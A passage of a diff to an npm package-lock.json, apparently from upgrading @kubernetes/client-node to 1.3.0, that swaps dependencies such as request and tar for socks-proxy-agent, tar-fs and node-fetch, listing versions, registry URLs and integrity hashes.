- "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/request/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" + "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/string-width-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/string-width-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" + "wrappy": "1" } }, - "node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "node_modules/openid-client": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", + "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" + "jose": "^5.9.6", + "oauth4webapi": "^3.1.1" }, "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" + "url": "https://github.com/sponsors/panva" } }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "node_modules/pump": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", + "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", + "license": "MIT", "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/strip-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "node_modules/require-from-string": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", "engines": { - "node": ">=8" + "node": ">=0.10.0" } }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=18" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=0.8" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", "dependencies": { - "safe-buffer": "^5.0.1" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" }, "engines": { - "node": "*" + "node": ">= 14" } }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", + "engines": { + "node": ">= 0.10.0" } }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "node_modules/tar-fs": { + "version": "3.0.9", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.9.tgz", + "integrity": "sha512-XF4w9Xp+ZQgifKakjZYmFdkLoSWd34VGKcsTCwlNWM7QG3ZbaxnTsaBwnjFZqHRf/rROxaR8rXnbtwdvaDI+lA==", + "license": "MIT", "dependencies": { - "isexe": "^2.0.0" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4" } }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } + "node_modules/undici-types": { + "version": "6.20.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", + "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, - "node_modules/wrap-ansi-cjs/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/wrap-ansi-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -1235,38 +659,9 @@ "optional": true } } - }, - "node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } } }, "dependencies": { - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, "@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", @@ -1280,28 +675,62 @@ "requires": {} }, "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "requires": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", "openid-client": "^6.1.3", - "request": "^2.88.0", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": 